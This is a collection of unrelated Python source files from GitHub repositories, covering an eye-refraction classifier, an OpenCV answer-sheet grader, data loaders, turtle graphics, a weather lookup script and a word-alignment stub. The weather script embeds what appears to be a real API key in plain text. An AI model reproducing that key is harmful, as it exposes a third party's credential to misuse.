--------\n meanParams: dict\n classifier parameter yielding best mean score\n meanScore: float\n classification score obtained using meanParams\n maxParams: dict\n a dictionary with parametes yielding best max score\n maxScore: float\n classification score obtained using maxParams\n \"\"\"\n if classifier.__class__ is str:\n classifier=[classifier]\n elif classifier.__class__ is not list:\n raise Exception('classifier must be either the name of the classifier or a list of names')\n\n bestResults = pd.DataFrame() # records from all classifiers\n bestParams = np.ndarray(shape=len(classifier),dtype=dict)\n cIdx = 0\n for classIdx in classifier:\n # get classifier specific parameters\n params = self.GetClassifier().get_params()\n domain = self.GenerateParameterDomain(classIdx)\n # Preallocate grid score results\n vals = list(domain.values())\n attr = list(domain.keys())\n bestScore = 0\n print('Testing classifier: {}'.format(classIdx))\n for vInds in list(itertools.product(*vals)):\n # Assign parameters\n for vIdx in range(len(vInds)):\n params.__setitem__(attr[vIdx],vInds[vIdx])\n print(f'setting {attr[vIdx]} to {vInds[vIdx]}')\n # Run classifier\n if predict.lower() =='deltaset':\n results = self.PredictDeltaSet(classifier=classIdx,target=target,\n eye=eye,numTrials=numTrials,\n delta=delta,features=features,\n autoSelectFeatures=autoSelectFeatures,\n equalizeTrainingClasses=equalizeTrainingClasses,\n # standardize=standardize,\n trainProp=trainProp,\n classifierParams=params,alpha=alpha)\n elif predict.lower() =='correction':\n results, _ = self.PredictCorrection(classifier=classIdx,target=target,\n numTrials=numTrials,\n # standardize=standardize,\n autoSelectFeatures=autoSelectFeatures,\n trainProp=trainProp,\n rejProp=rejProp,\n cylinderDelta=cylinderDelta,\n sphereDelta=sphereDelta,\n equalizeTrainingClasses=equalizeTrainingClasses,\n classifierParams=params,alpha=alpha)\n\n if maximize.lower()=='mean' and results.loc[0,'succ_mean']>bestScore:\n bestScore = results.loc[0,'succ_mean']\n newBestScore = True\n elif maximize.lower()=='min' and results.loc[0,'succ_min']>bestScore:\n bestScore = results.loc[0,'succ_min']\n newBestScore = True\n elif maximize.lower()=='max' and results.loc[0,'succ_max']>bestScore:\n print('here')\n bestScore = results.loc[0,'succ_max']\n newBestScore = True\n else:\n newBestScore = False\n\n if newBestScore:\n bestResults.loc[cIdx,'classifier'] = classIdx\n 
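The grid walk at the heart of `GridFitClassifier` pairs `itertools.product` over the domain values with a parameter dict keyed by the domain's attribute names. The core pattern in isolation, on a toy domain:

```python
import itertools

domain = {'criterion': ['gini', 'entropy'], 'max_depth': [10, 100]}
attr = list(domain.keys())
vals = list(domain.values())

# every combination of the domain values, exactly as the grid loop walks them
for vInds in itertools.product(*vals):
    params = dict(zip(attr, vInds))
    print(params)
# -> 4 combinations, starting with {'criterion': 'gini', 'max_depth': 10}
```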
bestResults.loc[cIdx,'min'] = results.loc[0,'succ_min']\n bestResults.loc[cIdx,'mean'] = results.loc[0,'succ_mean']\n bestResults.loc[cIdx,'max'] = results.loc[0,'succ_max']\n bestResults.loc[cIdx,'rand'] = results.loc[0,'succ_rand']\n bestResults.loc[cIdx,'std'] = results.loc[0,'succ_std']\n # copy classifier parameters\n bestParams[cIdx] = params.copy()\n cIdx+=1\n return bestResults, bestParams\n\n def GenerateParameterDomain(self, classifier):\n \"\"\"\n This is a service function to generate a domain of hypoerparameters\n be used in GridFitClassifier for tuning\n Parameters:\n -----------\n classifier: str, classifier name or initials\n classifier name, see GetClassifier for classifier names and initials\n Output:\n ---------\n domain: dict,\n dictioinary with classifier specific parameter names\n and range of values to be tested\n\n \"\"\"\n if np.isin(classifier.lower(),['lr','logisticregression']):\n domain = {'C':[0.01, 0.5, 1.0,5.0,10.0],'solver':['newton-cg'],\n 'penalty':['l2','none']}\n elif classifier.lower()=='svm':\n domain = {'C':[0.01,0.1,1.0,5.0,10.0,50.0],\n 'kernel':['poly','rbf','sigmoid'],\n 'degree':[1,2,3],\n 'gamma':['scale']}\n elif np.isin(classifier.lower(),['dt','decisiontree']):\n domain = {'criterion':['gini','entropy'],\n 'max_depth':[10,100,200,300],\n 'max_leaf_nodes':[2,5,10,20],\n 'min_samples_leaf':[10,20,50],\n 'min_samples_split':[2,4,6,10]}\n elif np.isin(classifier.lower(),['rf','randomforest']):\n domain = {'max_depth':[100,200,300,400,500],\n 'n_estimators':[100,200,300,400,500,600,1000],\n 'criterion':['gini','entropy'],\n 'min_samples_split':[2,5,10,20]}\n # 'min_samples_leaf':[1,5,10]}\n elif np.isin(classifier.lower(),['nn','neuralnetwork']):\n domain = {'activation':['relu','logistic'],\n 'hidden_layer_sizes':[(10,),(10,10,),(10,10,10,),(5,10,20)],\n 'solver':['lbfgs','adam'],\n 'alpha':[1e-1,1e-3,1e-4],\n 'early_stopping':[True,False],\n 'learning_rate':['constant','adaptive']}\n elif np.isin(classifier.lower(),['knn']):\n domain = {'weights':['distance','uniform'],\n 'n_neighbors':[5,10,30,50,80,100],\n 'p':[1,2,3,4],\n 'leaf_size':[2,5,10,20,50],\n 'algorithm':['kd_tree','ball_tree','brute']}\n elif np.isin(classifier.lower(),['nb','naivebayes']):\n domain = {'var_smoothing':[1e-1,1e-2,1e-3,1e-5,1e-9]}\n elif np.isin(classifier.lower(),['ab','adaboost']):\n domain = {'n_estimators':[5,10,20,50,100,150],\n 'learning_rate':[1.0,0.5, 0.1]}\n elif np.isin(classifier.lower(),['qda','quadraticdiscriminantanalysis']):\n domain = {'reg_param':[0.1,1.0,2.0,5.0],\n 'store_covariance':[True,False],\n 'tol':[1e-1,1e-2,1e-4,1e-5]}\n elif np.isin(classifier.lower(),['lda','lineardiscriminantanalysis']):\n domain = {'solver':['lsqr','eigen'],\n 'shrinkage':[0.01,0.1, 0.5,'auto']}\n else:\n raise Exception('option classifier={} is not supported'.format(classifier))\n\n return domain\n\n def GetClassifier(self,params=dict()):\n \"\"\"\n Construct a classifier save on the class\n Parameters:\n -----------\n classifier: {'lr','svm','dt','rf','nn','nb','ab','qda','lda','knn','bag'}, default:\n knn'\n classifier name or initials:\n logistic regression: 'lr', or 'logisticRegression'\n support vector machine: 'svm'\n Decision tree: 'dt', or 'decisionTree'\n Random forest: 'rf', or 'randomForest'\n Neural network: 'nn', or 'neuralNetwork'\n Naive bayes: 'nb', or 'naiveBayes'\n adaboost': 'ab', or 'adaboost'\n linear discriminant analysis: 'lda', or lineardiscriminantanalysis\n quadratic descriminant analysis: 'qda', or 'quadraticdiscriminantanalysis'\n k 
nearest-neighbors: 'knn'\n\n        params: dict\n            A dictionary mapping classifier-specific parameter names to values\n\n        Output:\n        -----------\n        model: RandomForestClassifier\n            The configured classifier (this implementation currently always builds a random forest)\n        \"\"\"\n\n        # note: the deprecated min_impurity_split keyword (removed from recent scikit-learn releases) is no longer passed\n        model = RandomForestClassifier(max_depth=200,\n                                       n_estimators=500,\n                                       criterion = 'gini',\n                                       # min_samples_split = 45,\n                                       # min_samples_leaf= 50,\n                                       # max_leaf_nodes = 9,\n                                       # bootstrap=True,\n                                       # max_features=15,\n                                       warm_start=True, # n_estimators increases with each trial to fit new trees\n                                       oob_score=True)\n\n\n        # Set classifier parameters from input params\n        if len(params.keys())>0:\n            modelParams = list(model.get_params().keys())\n            for kIdx in params.keys():\n                if np.isin(kIdx,modelParams):\n                    model.__setattr__(kIdx,params.get(kIdx))\n                else:\n                    raise Exception(f'Parameter {kIdx} is not supported for classifier Random forest')\n        return model\n\n    def LoadCylinderClassifier(self,modelPath):\n        # load a cylinder correction model\n        with open(modelPath, 'rb') as fh:\n            self.cylModel = pickle.load(fh)\n        self.cylinderModelLoaded = True\n\n    def LoadSphereClassifier(self,modelPath):\n        with open(modelPath, 'rb') as fh:\n            self.sphModel = pickle.load(fh)\n        self.sphereModelLoaded = True\n\n    def PredictSphere(self,features):\n        sphClass = None\n        if self.sphereModelLoaded:\n            sphClass = self.sphModel.predict(np.asanyarray(features).reshape(1,-1))\n        return sphClass\n\n    def PredictCylinder(self,features):\n        cylClass = None\n        if self.cylinderModelLoaded:\n            cylClass = self.cylModel.predict(np.asanyarray(features).reshape(1,-1))\n        return cylClass\n\n    def ExportClassifier(self,classifier, fileName='trainedClassifier.sav'):\n        # export a trained classifier\n        # TODO: make sure the classifier entered is of the right class\n        with open(fileName,'wb') as fh:\n            pickle.dump(classifier, fh)\n\n    def PlotFeatures(self,target='seDelta',eye='both',delta=0.25,plotType='scatter'):\n        \"\"\"\n        Plots features vs.
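`ExportClassifier` and the `Load*Classifier` helpers persist the trained model with pickle. A self-contained round-trip under the same scheme (the file name and toy training data are illustrative; `joblib` is a common alternative for scikit-learn models):

```python
import pickle
from sklearn.ensemble import RandomForestClassifier

model = RandomForestClassifier(n_estimators=10).fit([[0], [1], [2], [3]], [0, 0, 1, 1])

with open('trainedClassifier.sav', 'wb') as fh:    # export, as ExportClassifier does
    pickle.dump(model, fh)
with open('trainedClassifier.sav', 'rb') as fh:    # reload, as LoadCylinderClassifier does
    restored = pickle.load(fh)

# the restored model reproduces the original predictions
assert (restored.predict([[3]]) == model.predict([[3]])).all()
```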
 target class either a scatter plot or histograms.\n\n        Parameters:\n        -----------\n        plotType: {'scatter','hist'}, default: 'scatter'\n            Type of plot, either scatter or histogram\n        eye: {'left', 'right', 'both'}, default: 'both'\n            data to use for the plot\n        target: {'seDelta', 'sphereDelta', 'cylinderDelta'}, default: 'seDelta'\n            the Delta set\n        delta: {float}, default: 0.25\n            positive scalar defining the set |Delta|<= delta.\n        \"\"\"\n        data = self.GetData(eye=eye)\n\n        if target.lower()=='sedelta':\n            y = data.loc[:,'SphericalEqDelta']\n        elif target.lower() =='cylinderdelta':\n            y = data.loc[:,'CylinderDelta']\n        elif target.lower()=='spheredelta':\n            y = data.loc[:,'SphereDelta']\n        else:\n            raise Exception('option target={} is not supported'.format(target))\n\n        indsIn = np.where(np.abs(y)<=delta)[0]\n        indsOut = np.where(np.abs(y)>delta)[0]\n\n        keys = list(self.featureList.keys())\n        # plt.figure(figsize=(5,5))\n        for axIdx in range(len(self.featureList)):\n            ax = plt.figure().add_subplot()\n            # ax = plt.subplot(5,5,axIdx+1)\n\n            if plotType.lower()=='scatter':\n                ax.plot(data.loc[data.index[indsIn],keys[axIdx]],y.loc[y.index[indsIn]],'g.')\n                ax.plot(data.loc[data.index[indsOut],keys[axIdx]],y.loc[y.index[indsOut]],'r.')\n                plt.xlabel(keys[axIdx])\n                plt.ylabel(target)\n            elif np.isin(plotType.lower(),['hist','histogram']):\n                h,bins = np.histogram(data.loc[data.index[indsIn],keys[axIdx]])\n                ax.plot(bins[1:],h/np.sum(h))\n                h,bins = np.histogram(data.loc[data.index[indsOut],keys[axIdx]])\n                ax.plot(bins[1:],h/np.sum(h))\n            elif plotType.lower()=='cumulative':\n                h,bins = np.histogram(data.loc[data.index[indsIn],keys[axIdx]])\n                ax.plot(bins[1:],np.cumsum(h/np.sum(h)))\n                h,bins = np.histogram(data.loc[data.index[indsOut],keys[axIdx]])\n                ax.plot(bins[1:],np.cumsum(h/np.sum(h)))\n\n    def TestDistributionSimilarity(self,data1,data2,alpha=0.05):\n        \"\"\"\n        Perform a two-sided Kolmogorov-Smirnov test to examine\n        whether two samples are drawn from the same continuous distribution.\n        The samples are typically those with |Delta|<=delta and |Delta|>delta,\n        where Delta is either the spherical equivalent delta, the cylinder or sphere delta.\n        If the test statistic is small or the p-value high, we cannot reject the\n        null hypothesis that the two samples are drawn from the same distribution. \\n\n\n        Parameters:\n        ----------\n        data1, data2: DataFrame\n            the two samples to compare; must share the same field names\n        alpha: float, default=0.05\n            the confidence level of the KS test is: 1-alpha\n\n        Output:\n        --------\n        res:\n            a DataFrame including the test statistic, p-value, and decision for the null hypothesis\n        \"\"\"\n        if alpha>1 or alpha<0:\n            raise Exception('Invalid alpha value. alpha must be in the range (0,1).')\n\n\n        # check that data1 and data2 have the same field names\n        if (data1.keys()==data2.keys()).all() ==False:\n            raise Exception('The two datasets must contain the same field names')\n\n        keys = data1.keys()\n        n = len(data1)\n        m = len(data2)\n        res = pd.DataFrame()\n        for featIdx in range(len(keys)):\n            # perform a k-s test for the similarity between the in and out groups\n            k = stats.ks_2samp(data1.loc[:,keys[featIdx]],data2.loc[:,keys[featIdx]])\n            res.loc[featIdx,'Feature'] = keys[featIdx]\n            res.loc[featIdx,'KS'] = k.statistic\n            res.loc[featIdx,'pvalue'] = k.pvalue\n            res.loc[featIdx,'rejectH0'] = k.statistic>=(np.sqrt(-0.5*np.log(alpha/2))*np.sqrt((n+m)/(n*m)))\n            res.loc[featIdx,'m'] = m\n            res.loc[featIdx,'n'] = n\n\n        return res\n\n    def SelectFeaturesByKSTest(self,featureMat,labels,alpha=0.05,rejProp=0.5):\n        \"\"\"\n        Select features automatically according to those that show a high level of\n        separation between the distributions of |Delta|<=delta\n        and |Delta|>delta, based on the Kolmogorov-Smirnov two-sided test statistic.\n        The KS null hypothesis is that the two sets are from the same\n        continuous distribution.\n\n        Parameters:\n        -----------\n        featureMat: DataFrame\n            feature matrix as a DataFrame, with keys corresponding to features\n        labels: array\n            class label per row of featureMat\n        alpha : float, default=0.05\n            defines the KS confidence interval as confidence = 1-alpha\n        rejProp: float, default=0.5\n            in pairwise comparison, a feature is selected if the null hypothesis\n            was rejected at least round(rejProp*(numClasses-1)) times.\n            rejProp must be strictly positive and smaller than 1\n        Output:\n        -------\n        featureMat: DataFrame\n            DataFrame with keys corresponding to selected features\n        \"\"\"\n\n        # Check that the number of labels matches the number of observations\n        if len(featureMat)!=len(labels):\n            raise Exception('Number of rows in featureMat must match that in labels vector')\n\n        # Get all unique labels\n        uLabels = np.unique(labels)\n        numClasses = len(uLabels)\n        labelInds = list(range(numClasses))\n        # get all unique label pairs\n        labelPairs = list(itertools.product(labelInds,repeat=2))\n        indsList = np.ndarray(shape=(numClasses,numClasses),dtype=list)\n        for lIdx in labelPairs:\n            # print('Comparing classes {} and {}'.format(lIdx[0],lIdx[1]))\n            inds1 = featureMat.index[np.where(labels==lIdx[0])[0]]\n            inds2 = featureMat.index[np.where(labels==lIdx[1])[0]]\n            data1 = featureMat.loc[inds1]\n            data2 = featureMat.loc[inds2]\n            res = self.TestDistributionSimilarity(data1,data2,alpha=alpha)\n            indsList[lIdx[0],lIdx[1]] = res.index[np.where(res['rejectH0']==True)[0]]\n\n        numFeatures = len(featureMat.keys())\n        indScore = np.zeros(shape=numFeatures,dtype=int)\n        for i1Idx in range(numClasses):\n            for i2Idx in range(numClasses):\n                for fIdx in indsList[i1Idx,i2Idx]:\n                    indScore[fIdx]+=1\n        indScore = indScore/2\n\n        featureInds = np.where(indScore>=np.round(rejProp*(numClasses-1)))[0]\n        featureMat = featureMat.loc[:,featureMat.keys()[featureInds]]\n        # record the names of the selected features (the original indexed a plain list with an array, which raises a TypeError)\n        self.featuresUsed = list(featureMat.keys())\n        return featureMat\n\n    def SelectFeatures(self,fMat,labels,mode='k_best',alpha=0.05):\n        '''\n        Select features based on alpha threshold\n        '''\n        if len(labels)!=len(fMat):\n            raise Exception('The number of labels must match the number of rows in 
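`TestDistributionSimilarity` rejects H0 when the KS statistic exceeds the large-sample critical value sqrt(-ln(alpha/2)/2) * sqrt((n+m)/(n*m)), exactly the expression computed above. A standalone check of that decision rule on synthetic samples:

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(1)
sample1 = rng.normal(0.0, 1.0, size=300)   # e.g. features with |Delta| <= delta
sample2 = rng.normal(0.5, 1.0, size=400)   # e.g. features with |Delta| > delta

k = stats.ks_2samp(sample1, sample2)       # two-sided two-sample KS test
n, m = len(sample1), len(sample2)
alpha = 0.05
critical = np.sqrt(-0.5 * np.log(alpha / 2)) * np.sqrt((n + m) / (n * m))
print(k.statistic, k.pvalue, k.statistic >= critical)   # rejectH0 is True here
```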
featureMat')\n\n # Normalize features between 0 and 1\n # fMat = featureMat.copy()\n for k in fMat.keys():\n fMat[k] = (fMat[k] -np.min(fMat[k]))/(np.max(fMat[k])- np.min(fMat[k]))\n selector = sklearn.feature_selection.GenericUnivariateSelect(mode=mode)\n # selector = sklearn.feature_selection.SelectFdr(score_func= sklearn.feature_selection.chi2,alpha=alpha)\n # selector = sklearn.feature_selection.SelectFpr(score_func= sklearn.feature_selection.chi2,alpha=alpha)\n # selector = sklearn.feature_selection.SelectKBest(score_func= sklearn.feature_selection.chi2,k=5)\n fit = selector.fit(fMat,labels)\n featInds = np.where(fit.get_support())[0]\n self.featuresUsed = fMat.keys()[featInds]\n print('Num features selected : {}'.format(len(self.featuresUsed)))\n fMat = fMat.loc[:,self.featuresUsed]\n return fMat\n\n @staticmethod\n def _ParseGender(genStr):\n if genStr.__class__==str:\n if genStr in ['f','F']:\n return 1\n elif genStr in ['m','M']:\n return 0\n else:\n return np.nan\n\n\n","repo_name":"almakonde/AutorefEyelib","sub_path":"Refraction/Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":71453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40289483805","text":"import cv2\nimport numpy as np\nimport utlis\nfrom PIL import Image, ImageDraw, ImageFont\n\n############################################\npath=\"1.jpg\"\nwidthImg =700\nheightImg =600\n\nsecimSayisi=4\nsorusayisi=10\n\n#CEVAP ANAHATARI\nans=[1, 3, 3, 2, 2, 2, 3, 1, 0, 2, 2, 1, 1, 0, 1, 1, 3, 1, 0,1 ] \n\n\n\n\n################# TEST ALANI ###############\ny=90\nxsol=280\nxsag=460\nw=132\nh=420\nesikdeger=200\n############################################\n\n################# öĞRENCİ NUMARASI #########\nox=70\noy=105\now=172\noh=370\n############################################\n\nwebcamFeed=True\ncameraNo=0\n\ncap=cv2.VideoCapture(cameraNo)\ncap.set(10,150)\ncap.set(28,10) #focus ayar\n\nwhile True:\n if webcamFeed:success,img=cap.read()\n #if False:img=cv2.imread(path)\n else:img=cv2.imread(path)\n\n img=cv2.resize(img,(widthImg ,heightImg))\n img=cv2.rotate(img, cv2.ROTATE_180)\n imgCountours=img.copy()\n imageFinal=img.copy()\n imgBiggestCountours=img.copy()\n\n imgGray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n imgBlur=cv2.GaussianBlur(imgGray,(5,5),1)\n imgCanny=cv2.Canny(imgBlur,10,50)\n\n try:\n #FIND ALL COUNTERS\n countours,hierarchy=cv2.findContours(imgCanny,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n cv2.drawContours(imgCountours,countours,-1,(0,255,0),10)\n\n #FIND RECTANGLES\n rectCon=utlis.rectContour(countours)\n biggestContour=utlis.getCornerPoints(rectCon[0])\n #print(biggestContour)\n \n if biggestContour.size!=0:\n cv2.drawContours(imgBiggestCountours,biggestContour,-1,(0,255,0),20)\n biggestContour=utlis.reorder(biggestContour)\n pts1 = np.float32(biggestContour) # PREPARE POINTS FOR WARP\n pts2 = np.float32([[0, 0],[widthImg, 0], [0, heightImg],[widthImg, heightImg]]) # PREPARE POINTS FOR WARP\n matrix = cv2.getPerspectiveTransform(pts1, pts2) # GET TRANSFORMATION MATRIX\n imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg)) # APPLY WARP PERSPECTIVE\n\n #APPLY TRESHOLD\n\n imgWarpGray=cv2.cvtColor(imgWarpColored,cv2.COLOR_BGR2GRAY)\n imgThresh=cv2.threshold(imgWarpGray,100,255,cv2.THRESH_BINARY_INV)[1]\n\n #boxes=utlis.splitBoxes(imgThresh)\n #cv2.imshow(\"test\",boxes[1])\n \n \n\n crop_imgSol = imgThresh[y:y+h, xsol:(xsol+w)]\n crop_imgSag = imgThresh[y:y+h, xsag:(xsag+w)]\n crop_imgOgrenciNu = 
imgThresh[oy:oy+oh, ox:(ox+ow)]\n\n #cv2.imshow(\"cropped\", crop_imgOgrenciNu)\n #cv2.imwrite(\"croppedsol.jpg\",crop_imgSol)\n #cv2.imwrite(\"croppedsag.jpg\",crop_imgSag)\n\n boxesSol=utlis.splitBoxes(crop_imgSol)\n boxesSag=utlis.splitBoxes(crop_imgSag)\n boxesOgrenciNu=utlis.splitBoxesOgrenciNu(crop_imgOgrenciNu)\n \n \n sorusayisi=20\n #GETTING NOPIXEL VALUES OF EACH\n myPixelVal=np.zeros((sorusayisi,secimSayisi))\n \n myPixelValOgrenciNu=np.zeros((4,10))\n countC=0\n countR=0\n\n for image in boxesOgrenciNu:\n totalPixels=cv2.countNonZero(image)\n myPixelValOgrenciNu[countR][countC]=totalPixels\n countC+=1\n if(countC==10):countR+=1;countC=0\n #print(myPixelValOgrenciNu)\n \n countC=0\n countR=0\n\n for image in boxesSol:\n totalPixels=cv2.countNonZero(image)\n myPixelVal[countR][countC]=totalPixels\n countC+=1\n if(countC==secimSayisi):countR+=1;countC=0\n #print(myPixelVal)\n \n for image in boxesSag:\n totalPixels=cv2.countNonZero(image)\n myPixelVal[countR][countC]=totalPixels\n countC+=1\n if(countC==secimSayisi):countR+=1;countC=0\n\n\n #FINDING INDEX VALUES OF THE MARKINGS\n\n myIndexOgrenciNu=[]\n for x in range(0,4):\n arr=myPixelValOgrenciNu[x]\n #print(\"arr\",arr)\n myIndexVal=np.where(arr==np.amax(arr))\n #print(myIndexVal[0])\n myIndexOgrenciNu.append(myIndexVal[0][0])\n ogrenciNumarasi=str(myIndexOgrenciNu[0])+str(myIndexOgrenciNu[1])+str(myIndexOgrenciNu[2])+str(myIndexOgrenciNu[3])\n #print('Öğrenci numarası {}'.format(ogrenciNumarasi))\n\n \n #cv2.imshow('mum',utlis.showNumber2(imgWarpColored,myIndexOgrenciNu,4,10,ox,oy,ow,oh))\n \n myIndex=[]\n for x in range(0,sorusayisi):\n isaretsayisi=0\n arr=myPixelVal[x]\n #print(\"arr-\"+str(x),arr)\n print('max',np.amax(arr))\n #print('sayı',np.count_nonzero(arr>esikdeger))\n isaretsayisi=np.count_nonzero(arr>esikdeger)\n enfazla=np.amax(arr)\n if isaretsayisi>1:\n myIndexVal[0][0]=5 #iki ve dahafazla işaretlenmiş\n elif esikdegerHBB', f.read(4))\n shape = tuple(struct.unpack('>I', f.read(4))[0] for d in range(dims))\n return np.fromstring(f.read(), dtype=np.uint8).reshape(shape)\n\ndef load_data():\n '''\n return a tuple of X_train, y_train, X_test, y_test where:\n X is a matrix of examples (one example one row)\n y is a column vector of labels\n '''\n x_train = _read_idx(TRAIN_DATA_PATH)\n y_train = _read_idx(TRAIN_LABELS_PATH)\n x_test = _read_idx(TEST_DATA_PATH)\n y_test = _read_idx(TEST_LABELS_PATS)\n return x_train, y_train, x_test, y_test\n\n","repo_name":"LoGosX/handwritten-digit-recognition","sub_path":"load_image_data.py","file_name":"load_image_data.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23033822443","text":"#!/usr/bin/env python\n# -*- coding: latin-1 -*-\nimport requests\nimport json\nfrom cuarto import *\nfrom escenarios import *\n\n\ndef get_data_api():\n try:\n x = requests.get('https://api-escapamet.vercel.app/')\n api = json.loads(x.text)\n return api\n except:\n print('No se pudo extraer los datos de la API')\n return []\n\napi = get_data_api()\n\nfor i, dic in enumerate(api): # crea los objetos cuarto con los datos de la API\n if dic['name'] == 'Biblioteca':\n biblioteca = Cuarto(dic['name'], dic['objects'], biblioteca_escenario)\n elif dic['name'] == 'Laboratorio SL001':\n laboratorio_sl = Cuarto(dic['name'], dic['objects'], laboratorio_sl_escenario)\n elif dic['name'] == 'Plaza Rectorado':\n plaza_rectorado = Cuarto(dic['name'], dic['objects'], plaza_rectorado_escenario)\n elif 
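The grading script decides each question by counting the non-zero pixels in every answer cell, taking the largest cell as the marked bubble, and flagging rows where more than one cell crosses the `esikdeger` threshold. The decision logic in isolation, with a synthetic row of pixel counts standing in for the `cv2.countNonZero` output:

```python
import numpy as np

esikdeger = 200                          # marked-bubble threshold, as in the script
row = np.array([35, 820, 60, 40])        # non-zero pixel counts for choices A-D (illustrative)

isaretsayisi = np.count_nonzero(row > esikdeger)   # how many bubbles look filled
if isaretsayisi == 0:
    answer = None                        # blank row
elif isaretsayisi > 1:
    answer = 'invalid'                   # two or more marks
else:
    answer = int(np.argmax(row))         # index of the single filled bubble
print(answer)                            # -> 1, i.e. choice B
```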
dic['name'] == 'Pasillo Laboratorios ':\n pasillo_labs = Cuarto(dic['name'], dic['objects'], pasillo_labs_escenario)\n else:\n cuarto_servidores = Cuarto(dic['name'], dic['objects'], cuarto_servidores_escenario)\n\nbiblioteca.definir_posiciones(pasillo_labs, plaza_rectorado)\nlaboratorio_sl.definir_posiciones(cuarto_servidores, pasillo_labs)\nplaza_rectorado.definir_posiciones(False, biblioteca)\npasillo_labs.definir_posiciones(laboratorio_sl, biblioteca)\ncuarto_servidores.definir_posiciones(False, laboratorio_sl)\n\n","repo_name":"sabucds/proyecto-algoritmos","sub_path":"manejo_api.py","file_name":"manejo_api.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8788655696","text":"from turtle import Turtle\r\nt=Turtle()\r\n\r\ndef up():\r\n if not(t.heading() == 90):\r\n t.setheading(90)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n \r\ndef down():\r\n if not(t.heading() == 270):\r\n t.setheading(270)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n \r\ndef right():\r\n if not (t.heading() == 0):\r\n t.setheading(0)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n \r\ndef left():\r\n if not (t.heading() ==180):\r\n t.setheading(180)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n\r\ndef undo_button():\r\n t.undo()\r\n\r\ndef pen_up():\r\n t.penup()\r\n\r\ndef pen_down():\r\n t.pendown()\r\n\r\ndef hide():\r\n t.hideturtle()\r\n \r\ndef keyboard_commands():\r\n t.screen.onkey(up,\"Up\")\r\n t.screen.onkey(down,\"Down\")\r\n t.screen.onkey(right,\"Right\")\r\n t.screen.onkey(left,\"Left\")\r\n t.screen.onkey(undo_button,\"End\")\r\n t.screen.onkey(pen_up,\"u\")\r\n t.screen.onkey(pen_down,\"d\")\r\n t.screen.onkey(hide,\"h\")\r\n t.screen.listen()\r\n\r\nkeyboard_commands()\r\n","repo_name":"nmessa/Dover-Girls-Coding-2018_2019","sub_path":"Turtle Graphics/turtleKeyboard.py","file_name":"turtleKeyboard.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37806438811","text":"import collections\nimport data_load\nimport pickle\ndef dic_build(vocabulary_size = 200000):\n '''\n 构建词典,和按顺序的全部语料。用pickle存储\n :return:\n '''\n\n count = [['unk',-1]]\n words = data_load.load_w2c_textcn_dataset()\n # 注意这里Counter返回的类型\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n dictionary = dict()\n\n for word, _ in count:\n # print(dictionary)\n dictionary[word] = len(dictionary)\n # data是label\n data = list()\n unk_count = 0\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n index = 0 # dictionary['UNK']\n unk_count = unk_count + 1\n data.append(index)\n count[0][1] = unk_count\n\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n with open('./data/dict_word_index.txt','wb') as f:\n pickle.dump(dictionary, f)\n with open(\"./data/data.txt\", \"wb\") as f:\n pickle.dump(data, f)\n with open(\"./data/dict_index_word.txt\",\"wb\") as f:\n pickle.dump(reverse_dictionary, f)\n\nif __name__ ==\"__main__\":\n dic_build()","repo_name":"xsh884826402/WordEmbedding","sub_path":"dic_build.py","file_name":"dic_build.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24338055517","text":"import requests \n\nAPI_KEY = \"4f4d0a95f3131789cb559719ff87d5bd\"\nBASE_URL = \"http://api.openweathermap.org/data/2.5/weather\"\n\ndef k_to_f(k):\n return ((k - 273.15) * (9/5)) + 
32\n\n\n\ndef format(data):\n    city = data[\"name\"] # City name\n    temp = round(k_to_f(data[\"main\"][\"temp\"]), 2)\n    kelvin_real = data['main']['feels_like']\n    real_feel = round(k_to_f(kelvin_real), 2)\n    max_temp = round(k_to_f(data[\"main\"][\"temp_max\"]), 2)\n    min_temp = round(k_to_f(data[\"main\"][\"temp_min\"]), 2)\n    description = data['weather'][0][\"description\"] # Description\n\n    string = f\"For today in {city}, the temperature is {temp}F with a real feel of {real_feel}F. You can expect {description}s with a high of {max_temp}F and a low of {min_temp}F.\"\n\n    return string\n\ndef main():\n    while True:\n        city = input(\"Enter a city name or 'q' to quit: \")\n        if city.lower() == 'q':\n            print(\"We're sad to see you go...\")\n            break\n        request_url = f\"{BASE_URL}?appid={API_KEY}&q={city}\"\n        response = requests.get(request_url)\n\n        if response.status_code == 200:\n            data = response.json()\n            print(format(data))\n        else:\n            code = response.status_code\n            print(f\"{code} error occurred.\")\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"gregSWEN/Python-Scripts","sub_path":"Weather API/Weather.py","file_name":"Weather.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}\n{"seq_id":"70264748249","text":"import pickle\nimport os\nfrom math import log\nfrom collections import Counter\nfrom lm_train import lm_train\nfrom log_prob import log_prob\nfrom preprocess import preprocess\n\ndef align_ibm1(train_dir, num_sentences, max_iter, fn_AM):\n    \"\"\"\n    Implements the training of the IBM-1 word alignment algorithm.\n    We assume that we are implementing P(foreign|english)\n\n    INPUTS:\n    train_dir : (string) The top-level directory name containing data\n        e.g., '/u/cs401/A2_SMT/data/Hansard/Testing/'\n    num_sentences : (int) the maximum number of training sentences to consider\n    max_iter : (int) the maximum number of iterations of the EM algorithm\n    fn_AM : (string) the location to save the alignment model\n\n    